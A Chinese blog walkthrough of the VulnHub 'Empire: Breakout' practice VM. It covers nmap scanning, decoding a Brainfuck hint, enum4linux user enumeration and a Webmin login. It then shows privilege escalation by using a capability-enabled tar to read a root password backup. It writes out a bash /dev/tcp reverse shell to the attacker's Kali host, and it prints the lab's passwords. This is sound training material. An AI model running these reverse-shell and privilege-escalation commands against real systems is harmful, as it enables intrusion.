Breakout

最新推荐文章于 2024-01-31 22:53:32 发布
最新推荐文章于 2024-01-31 22:53:32 发布
阅读量376 收藏
点赞数
分类专栏: 每周学习 文章标签: 网络 服务器 腾讯云
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51553814/article/details/127267207
版权

title: vulnhub-Breakout
date: 2022-10-11 15:29:25
tags:

  • 渗透学习
  • vulnhub
    categories:
  • vulnhub
    cover:

Breakout

第一步知道自己的ip,kali打开终端输入

ifconfig

请添加图片描述

知道了我们的ip为192.168.223.128

用nmap工具,因为靶场和kali都在自己电脑的vmware里,所以这俩在一个网段

因此扫描自己ip的网段

nmao -sP 192.168.223.128/24

请添加图片描述

128是本机,按照经验我们先测试133这个ip,使用nmap扫描端口

nmap -p 1-40000 192.168.233.133

请添加图片描述

发现开放了5个端口,可以判定这个就是我们的Breakout靶场了

继续利用nmap扫描,观察是否存在漏洞

nmap --script=vuln 192.168.223.133

请添加图片描述

发现10000端口存在cve-2006-339漏洞

但是网络上没有相关的复现,也没有poc无法验证

所以先去80端口看看http服务

浏览器上输入靶场ip即192.168.233.133访问页面

在这里插入图片描述

右键按V查看源码可以看到提示

在这里插入图片描述

这是一个Brainfuck的编码

网上搜索Brainfuck在线解密(这里给你们找了一个网站)然后把504这段字符串放进去解密点击Brainfuck to Text解密得到解密文本

在这里插入图片描述

这个字符串大概率是密码
.2uqPEfj3D<P'a-3

再查看其他页面

访问139和445端口时无法访问,但是访问10000和20000端口时返回了页面

在这里插入图片描述

密码我们获取了,我们得想办法获取用户名,

之前nmap扫描发现存在smb服务

这里我们可以使用enum4linux工具枚举用户名

enum4linux -r 192.168.223.133

发现了一个cyber的用户

尝试去登录,发现在端口为20000的网页上能登录,并且找到了shell界面(密码为.2uqPEfj3D<P’a-3)

在这里插入图片描述

在这里插入图片描述

进入shell界面第一步就是先ls查看文件

发现了user.txt文件,敏感的我们打开他便发现了第一个flag

ls
cat user.txt

在这里插入图片描述

接下来我们需要提权,首先想到的是suid提权,输入下面的命令,看看有没有可以提权的执行文件

find / -perm -u=s -type f 2>/dev/null

遗憾的是并没有可以提权的可执行文件,具体哪些文件可以提权参考这个地址[linux利用SUID提权](Linux下利用SUID提权 - 腾讯云开发者社区-腾讯云 (tencent.com)),原理是通过某些特定文件的s权限提权,s权限可以让文件在执行过程中保持root权限,执行结束后恢复普通用户权限,利用这一特性可以提权

在这里插入图片描述

这时想到了当时ls发现下面还有也给tar文件

网上查询资料知道tar也可以用来提权

getcap tar

发现有 cap_dac_read_search=ep 功能,能读取文件。在 /var/backups 目录下发现了一个密码备份文件:

即.old_pass.bak,但是只是只允许管理员来读取

在这里插入图片描述

上面tar可以读取任意文件,利用这一特性我们可以吧这个文件先压缩,在解压,这样这个文件的创建者用户就从root变成了我们

现在我们得回到之前的cyber的目录,因为那个目录才有tar命令

cd /home/cyber
./tar -cvf pass.tar /var/backups/.old_pass.bak
tar -xvf pass.tar
cat var/backups/.old_pass.bak

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BVhuQZze-1665478661190)(在这里插入图片描述
)]

于是得到了root的密码

Ts&4&YurgtRX(=~h

我们使用su命令发现不能直接使用 这个命令(原因我也没看明白,原文没说)

所以我们使用反弹shell的方式,可以在我们kali的机器上连接靶机的shell

先在kali上输入
nc -lvvp 7777
再在网页上输入
bash -i >& /dev/tcp/192.168.223.128/7777 0>&1

在这里插入图片描述

可以看到kali上已经连接上了,用户前面已经是cyber@breakout

现在就可以执行su命令

su
Ts&4&YurgtRX(=~h
id

可以看到已经是root权限了

cd /root
ls

看到rOOt.txt

cat rOOt.txt

得到最终的flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1rWHjx7Q-1665478661192)(在这里插入图片描述
)]

参考文献

Vulnhub-Empire: Breakout题解 - C0ngvv - 博客园

Vulnhub 靶场 EMPIRE: BREAKOUT - sainet - 博客园

参考文献

Vulnhub-Empire: Breakout题解 - C0ngvv - 博客园

Vulnhub 靶场 EMPIRE: BREAKOUT - sainet - 博客园

vulnhub-EMPIRE: BREAKOUT_大西瓜的安全之路的博客-CSDN博客

火火火与霍霍
关注
专栏目录
breakout-Deep-Q-Network:强化学习| 在Atari Breakout上执行DQN,对决DQN和Double DQN的tensorflow实现
05-11
:person_running: [强化学习]在Atari Breakout游戏上执行的Deep Q Network(DQN),决斗DQN和Double DQN的张量流实现 安装 键入以下命令以安装OpenAI Gym Atari环境。 $ pip3 install opencv-python gym gym[atari...
breakout
qq_48514193的博客
03-20 169
oscp
2021-01-21 SONiC系统管理16 端口扇出
weixin_44316184的博客
01-21 741
SONiC系统管理16 端口扇出 SONiC系统支持交换机端口的扇出功能。 端口扇出Breakout功能是指对交换机支持通过软件配置的方式把交换机的一个物理接口配置成单个单速率的接口或者多个低速率接口的功能。配置成多个低速率接口的模式需要满足多个低速率接口的带宽分配以端口的Lane速率为颗粒度,并且总速率不超过单端口情况下的速率。 例如一个100GE(4*25给)端口,通过Breakout成4个25GE端口,或者一个50GE端口加上两个25GE端口。 SONiC系统不支持运行中的动态修改Breakout模式
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 384
靶机超级简单。靶机和Kali桥接。
【Vulnhub靶场】Breakout
Nailaoyyds的博客
06-17 1000
目录前言一、信息收集0x00 arp-scan扫描0x01 nmap扫描0x02 dirsearch扫描二、漏洞利用0x01 webmin 远程代码漏洞0x02 Brainfuck0x03 enum4linux0x04 反弹shell0x05 搜集信息三、提权0x00 tar利用 总结 arp-scan -I eth1 -l https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致 正常页面 未发现webmin源码内
[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
weixin_47112073的博客
10-13 1092
渗透测试学习,vulnhub靶场练习,简单靶机Empire: Breakout
多种深度强化学习算法在雅达利游戏breakout中的设计与实现
06-02
本项目聚焦于在雅达利游戏《Breakout》中的应用,这是一种经典的砖块打砖块游戏,对智能体的反应速度和策略制定有着较高要求。 1. **深度Q网络(Deep Q-Network, DQN)**: DQN是最早将深度学习引入强化学习的算法之...
breakout-game_前端小游戏_breakout_
10-02
【标题】"breakout-game_前端小游戏_breakout_" 指的是一款利用原生JavaScript编写的打砖块游戏。在Web开发领域,前端小游戏是一种常见的练习项目,它可以帮助开发者提升JavaScript编程技能,同时也能增强对HTML、...
vulnhub靶场之Matrix-Breakout 2 Morpheus
最新发布
qq_58091216的博客
01-31 1603
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
02-Breakout vulnhub靶场(tar命令,反弹shell笔记)
weixin_62621015的博客
03-19 368
02-Breakout vulnhub靶场个人通关记录
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 1053
在Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 799
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
【VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3786
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1138
小菜鸡一枚
02-Breakout靶机实战思路总结(读取任意文件提权,smb协议,Enum4linux)
qq_39641273的博客
06-12 525
这个主机不算很难,对于新手难度适中,可以尝试练手,如果没有思路本篇文档可供参考。知识点:smb协议,Enum4linux,文件任意读取,brainfuck编码。
vuln靶机--BreakOut
bobo_milk的博客
05-17 1136
一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.149 可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。 二、漏洞发现 首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞 在查看了源
Vulnhub_Breakout
qq_45434762的博客
12-12 615
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
CVE-2019-14271复现
PMJ的博客
11-26 2254
CVE-2019-14271:加载不受信任的动态链接库 docker cp依赖的docker-tar组件会加载容器内部的nsswitch动态链接库,但自身却未被容器化。 hacker可以通过劫持容器内的nsswitch动态链接库实现对宿主机进程的代码注入,获得宿主机上的代码执行能力 问题所在:高权限进程自身未容器化,却加载了不可控的动态链接库,一旦控制了容器就可以通过修改容器内动态链接库来实现在宿主机上以root权限执行任意代码。 原理 执行docker cp后,docker daemon会启动一个dock
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值